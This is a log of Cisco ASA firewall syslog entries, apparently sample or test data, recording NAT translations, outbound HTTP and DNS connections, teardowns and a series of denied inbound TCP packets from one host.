%ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 
11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from 
inside:172.31.98.44/1459 to outside:100.66.98.44/8272 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30 -Oct 10 2018 12:34:56 
localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst 
inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP 
connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from 
inside:172.31.98.44/1279 to outside:100.66.98.44/8283 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 -Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 
to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30
